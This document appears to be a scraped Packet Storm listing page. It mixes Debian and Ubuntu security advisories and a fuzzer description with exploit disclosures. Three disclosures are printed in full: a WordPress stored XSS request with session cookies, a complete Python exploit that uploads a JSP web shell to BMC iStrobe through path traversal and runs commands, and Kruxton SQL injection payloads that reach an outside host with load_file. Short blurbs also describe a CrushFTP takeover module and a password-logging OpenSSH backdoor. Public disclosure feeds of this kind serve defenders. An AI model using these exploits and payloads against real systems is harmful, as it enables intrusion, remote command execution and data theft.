This Metasploit exploit module leverages an improperly controlled modification of dynamically-determined object attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1. It is possible to set some user's session properties by sending an HTTP request with specially crafted Header key-value pairs. This enables an unauthenticated attacker to access files anywhere on the server file system and steal the session cookies of valid authenticated users. The attack consists in hijacking a user's session and escalates privileges to obtain full control of the target. Remote code execution is obtained by abusing the dynamic SQL driver loading and configuration testing feature.

CrushFTP Remote Code Execution

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

American Fuzzy Lop plus plus 4.20c

Debian Linux Security Advisory 5659-1 - Bartek Nowotarski discovered that Apache Traffic Server, a reverse and forward proxy server, was susceptible to denial of service via HTTP2 continuation frames.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5659-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 14, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : trafficserverCVE ID         : CVE-2024-31309Bartek Nowotarski discovered that Apache Traffic Server, a reverse andforward proxy server, was susceptible to denial of service via HTTP2continuation frames.For the oldstable distribution (bullseye), this problem has been fixedin version 8.1.10+ds-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 9.2.4+ds-0+deb12u1.We recommend that you upgrade your trafficserver packages.For the detailed security status of trafficserver please refer toits security tracker page at:https://security-tracker.debian.org/tracker/trafficserverFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYcGbUACgkQEMKTtsN8TjZEQw//YeLDMyZ2KnFxSaZbRAv/UkFNmOsYEwNtYn7xDTdogl3jRWNgqye4wwK2IHB9H4r3n91yBEmQ8CeRTMk07/VI1salyaXHPy5lCK+FuBEp4g5pWT6aCAb6z1KWxfD7AUzFbnLOvLCINvNcnDrYQAn+qaVUxXaD4ArvzjFEfw+AMDNCEnRsiQs83lPzDr5Bm48WYK9MAJteuDoFbWYHjcpyY0ZNxj7VtZP6cSKBqDXcPOjaUZysJjDX3cXqCHEioz3X35SJa+GckVD90h7wzDSHZSaDflUVLc4wwZ5ZNZkzOBKwCvurh52f79hVVjRjlO9UzY+VNuBOqtgP8nX9ByTNDkcsa7Rojgv56km58OIheALPoDHJiTpEWt2CPhxwV3oFYNQzBu2akbCdW+s+ir8p4uS4BxK6B6gz+lfnFuQ+L1MIJtlSDoPu08IYf79aYJKMA33+hXL1rjCggWu1EfofQpQMB/yJkxK/dN4A2xKI91XJshIUPQAcScjDHYnomfBAPzcbiRlYgjJS9WXR7gckX5fKjR9MPOD4t9vaGpy+wMARAFNRxCVBnl/QLsRkpwoAznbqGknXtWsbqNjhkRaLIpLG29YS6gBD4c4D8Q5WKgU7hNC+m4ZZK49u495fwFbQi2nVzn3boCTNIeJDvqrZ0pRePIl97zjzyhxg8PFrgLA==XO+d-----END PGP SIGNATURE-----

Debian Security Advisory 5659-1

This is a backdoored version of openssh-8.0p1 where the ssh client will log the ssh username and ssh password into /opt/.../log.txt.

OpenSSH 8 Password Backdoor

Ubuntu Security Notice 6731-1 - It was discovered that YARD before 0.9.11 does not block relative paths with an initial ../ sequence, which allows attackers to conduct directory traversal attacks and read arbitrary files. This issue only affected Ubuntu 16.04 LTS. It was discovered that yard before 0.9.20 is affected by a path traversal vulnerability, allowing HTTP requests to access arbitrary files under certain conditions. This issue only affected Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6731-1  
April 15, 2024

yard vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in yard.

Software Description:  
- yard: Ruby documentation tool

Details:

It was discovered that YARD before 0.9.11 does not block relative paths  
with an initial ../ sequence, which allows attackers to conduct  
directory traversal attacks and read arbitrary files. This issue only  
affected Ubuntu 16.04 LTS. (CVE-2017-17042)

It was discovered that yard before 0.9.20 is affected by a path  
traversal vulnerability, allowing HTTP requests to access arbitrary  
files under certain conditions. This issue only affected Ubuntu 18.04  
LTS. (CVE-2019-1020001)

Aviv Keller discovered that the "frames.html" file within the Yard  
Doc's generated documentation is vulnerable to Cross-Site Scripting  
(XSS) attacks due to inadequate sanitization of user input within the  
JavaScript segment of the "frames.erb" template file. (CVE-2024-27285)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  yard                            0.9.28-2ubuntu0.1

Ubuntu 22.04 LTS:  
  yard                            0.9.26-1ubuntu0.1

Ubuntu 20.04 LTS:  
  yard                            0.9.24-1+deb11u1build0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  yard                            0.9.12-2ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  yard                            0.8.7.6+git20160220-3ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6731-1  
  CVE-2017-17042, CVE-2019-1020001, CVE-2024-27285

Package Information:  
  https://launchpad.net/ubuntu/+source/yard/0.9.28-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/yard/0.9.26-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/yard/0.9.24-1+deb11u1build0.20.04.1

Ubuntu Security Notice USN-6731-1

GLPI versions 10.x.x suffers from a remote command execution vulnerability via the shell commands plugin.

GLPI 10.x.x Remote Command Execution

WordPress WP Video Playlist plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)# Date: 12 April 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.1.1# Proof Of Concept:1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w# Vulnerable Property at Request: videoFields[post_type]# Payload: <script>alert(document.cookie)</script># Request:POST /wp-admin/options.php HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 395Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=video_managerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, ioption_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

Debian Linux Security Advisory 5658-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5658-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
April 13, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-2176 CVE-2023-6270 CVE-2023-7042 CVE-2023-28746  
                 CVE-2023-47233 CVE-2023-52429 CVE-2023-52434 CVE-2023-52435  
                 CVE-2023-52583 CVE-2023-52584 CVE-2023-52587 CVE-2023-52588  
                 CVE-2023-52589 CVE-2023-52593 CVE-2023-52594 CVE-2023-52595  
                 CVE-2023-52597 CVE-2023-52598 CVE-2023-52599 CVE-2023-52600  
                 CVE-2023-52601 CVE-2023-52602 CVE-2023-52603 CVE-2023-52604  
                 CVE-2023-52606 CVE-2023-52607 CVE-2023-52616 CVE-2023-52617  
                 CVE-2023-52618 CVE-2023-52619 CVE-2023-52620 CVE-2023-52621  
                 CVE-2023-52622 CVE-2023-52623 CVE-2023-52630 CVE-2023-52631  
                 CVE-2023-52632 CVE-2023-52633 CVE-2023-52635 CVE-2023-52637  
                 CVE-2023-52638 CVE-2023-52639 CVE-2023-52640 CVE-2023-52641  
                 CVE-2024-0340 CVE-2024-0841 CVE-2024-1151 CVE-2024-2201  
                 CVE-2024-22099 CVE-2024-23850 CVE-2024-23851 CVE-2024-24857  
                 CVE-2024-24858 CVE-2024-26581 CVE-2024-26582 CVE-2024-26583  
                 CVE-2024-26584 CVE-2024-26585 CVE-2024-26586 CVE-2024-26590  
                 CVE-2024-26593 CVE-2024-26600 CVE-2024-26601 CVE-2024-26602  
                 CVE-2024-26603 CVE-2024-26606 CVE-2024-26621 CVE-2024-26622  
                 CVE-2024-26625 CVE-2024-26626 CVE-2024-26627 CVE-2024-26629  
                 CVE-2024-26639 CVE-2024-26640 CVE-2024-26641 CVE-2024-26642  
                 CVE-2024-26643 CVE-2024-26651 CVE-2024-26654 CVE-2024-26659  
                 CVE-2024-26660 CVE-2024-26663 CVE-2024-26664 CVE-2024-26665  
                 CVE-2024-26667 CVE-2024-26671 CVE-2024-26673 CVE-2024-26675  
                 CVE-2024-26676 CVE-2024-26679 CVE-2024-26680 CVE-2024-26681  
                 CVE-2024-26684 CVE-2024-26685 CVE-2024-26686 CVE-2024-26687  
                 CVE-2024-26688 CVE-2024-26689 CVE-2024-26695 CVE-2024-26696  
                 CVE-2024-26697 CVE-2024-26698 CVE-2024-26700 CVE-2024-26702  
                 CVE-2024-26704 CVE-2024-26706 CVE-2024-26707 CVE-2024-26710  
                 CVE-2024-26712 CVE-2024-26714 CVE-2024-26715 CVE-2024-26717  
                 CVE-2024-26718 CVE-2024-26720 CVE-2024-26722 CVE-2024-26723  
                 CVE-2024-26726 CVE-2024-26727 CVE-2024-26731 CVE-2024-26733  
                 CVE-2024-26735 CVE-2024-26736 CVE-2024-26737 CVE-2024-26741  
                 CVE-2024-26742 CVE-2024-26743 CVE-2024-26744 CVE-2024-26745  
                 CVE-2024-26747 CVE-2024-26748 CVE-2024-26749 CVE-2024-26750  
                 CVE-2024-26751 CVE-2024-26752 CVE-2024-26753 CVE-2024-26754  
                 CVE-2024-26759 CVE-2024-26760 CVE-2024-26761 CVE-2024-26763  
                 CVE-2024-26764 CVE-2024-26765 CVE-2024-26766 CVE-2024-26769  
                 CVE-2024-26771 CVE-2024-26772 CVE-2024-26773 CVE-2024-26774  
                 CVE-2024-26775 CVE-2024-26776 CVE-2024-26777 CVE-2024-26778  
                 CVE-2024-26779 CVE-2024-26780 CVE-2024-26781 CVE-2024-26782  
                 CVE-2024-26787 CVE-2024-26788 CVE-2024-26789 CVE-2024-26790  
                 CVE-2024-26791 CVE-2024-26792 CVE-2024-26793 CVE-2024-26795  
                 CVE-2024-26798 CVE-2024-26800 CVE-2024-26801 CVE-2024-26802  
                 CVE-2024-26803 CVE-2024-26804 CVE-2024-26805 CVE-2024-26809  
                 CVE-2024-26810 CVE-2024-26811 CVE-2024-26812 CVE-2024-26813  
                 CVE-2024-26814 CVE-2024-26815 CVE-2024-26816 CVE-2024-27437

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.85-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYaIyZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RN3A/9HbzpFDgN8uqJJVEHYgDh38m+h/8maSC2qL3G9ZPEckWX6MLBm+yBWcJ0  
l/DesFcqc5Lh25bgWSO2jJ4TY4+dbTRFzFcJ/aTnbOKGoGCUQt0W9ZHFVwmkPKQN  
tbZm1W1K3u/5dz8qow1ntsQuBarD0uDpImbhOZdrk+n88yKVB4lqAqNgel6EPt03  
6SYAz/A3S1A3cgTEwz9udrA6du7yX/2vFwd9g4CO96VflHBgsHSnWAnmJZScZjIA  
MT8jWGEXUw0zPg78w6AieLWhXTRe/bRxzhPRtYMOwXu1rX3wcPO8cbF9+hgbdj9w  
VD+qKTP3PWzP7nxJ3KLRUf8NvHjOI5CvVJFR3UFVlOE+BtYO//POTZI9eUv9tU3x  
vqXXTuHN+uXHkOtvRImx0Hf6FxjQbdh6IuvK6ipb/YH6IE2jZOw94AYi75UkDkgf  
VBbQf7eShv81Z05tZQo1rFHQMYBbGjtpudJllQ8/zmbv+hM9WuL4NCkw6EQytFPU  
51lVn/8Cqx1wt0IAmKr4FQ3hz/d766jgQvByFQWhqs1ZD7vQy2SxbzzTsKT1Zlha  
GsRB5LNZXvIwZi/A4ls7+4YM4urbRljMFgU7sUaNl+nbhqcw0y/AoLcUGO+7vl6L  
S/9Mmm8mnmXvTTYCgw9tuLo/wCP9UlF5PTEsZTQyslJYVxu/bvQ=  
=IM/D  
-----END PGP SIGNATURE-----

Debian Security Advisory 5658-1txt

BMC Compuware iStrobe Web version 20.13 suffers from a remote shell upload vulnerability.

    #!/usr/bin/env python3# Exploit Title: Pre-auth RCE on Compuware iStrobe Web# Date: 01-08-2023# Exploit Author: trancap# Vendor Homepage: https://www.bmc.com/# Version: BMC Compuware iStrobe Web - 20.13# Tested on: zOS# CVE : CVE-2023-40304# To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files)# The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed.import requestsimport urllib.parseimport argparseimport sysdef upload_web_shell(url):  data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@page import=\"java.lang.*,java.io.*,java.util.*\" %><%Processp=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReaderstdInput = new BufferedReader(newInputStreamReader(p.getInputStream()));BufferedReader stdError = newBufferedReader(new InputStreamReader(p.getErrorStream()));Strings=\"\";while((s=stdInput.readLine()) !=null){out.println(s);};s=\"\";while((s=stdError.readLine()) !=null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"}  # If encoded, the web shell will not be uploaded properly  data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!')  # Checking if web shell already uploaded  r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False)  if r.status_code != 404:    return  r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data,verify=False)  if r.status_code == 200:    print(f"[+] Successfully uploaded web shell, it should beaccessible at {url}/istrobe/jsp/userhelp/ws.jsp")  else:    sys.exit("[-] Something went wrong while uploading the web shell")def delete_web_shell(url):  paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"}  response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp",data=paramsPost, headers=headers, cookies=cookies)  if r.status_code == 200:    print(f"[+] Successfully deleted web shell")  else:    sys.exit("[-] Something went wrong while deleting the web shell")def run_cmd(url, cmd):  data = f"cmd={cmd}"  r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data,verify=False)  if r.status_code == 200:    print(r.text)  else:    sys.exit(f'[-] Something went wrong while executing "{cmd}" command')parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE')parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target')parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami')parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true')args = parser.parse_args()upload_web_shell(args.url)run_cmd(args.url, args.cmd)if args.rm:  delete_web_shell(args.url)

BMC Compuware iStrobe Web 20.13 Shell Upload

Kruxton version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: kruxton-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/15/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''OR NOT 7810=7810 OR 'LaNe'='bRUy&password=v0N!p1j!S6    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 1998 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT(ELT(1998=1998,1))),0x716b627071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'jdui'='fNTo&password=v0N!p1j!S6    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 2923 FROM (SELECT(SLEEP(7)))UJBe) OR'ffIk'='SAqf&password=v0N!p1j!S6---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0/Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-multiple-sqli.html)## Time spent:01:15:00

Source

Packet Storm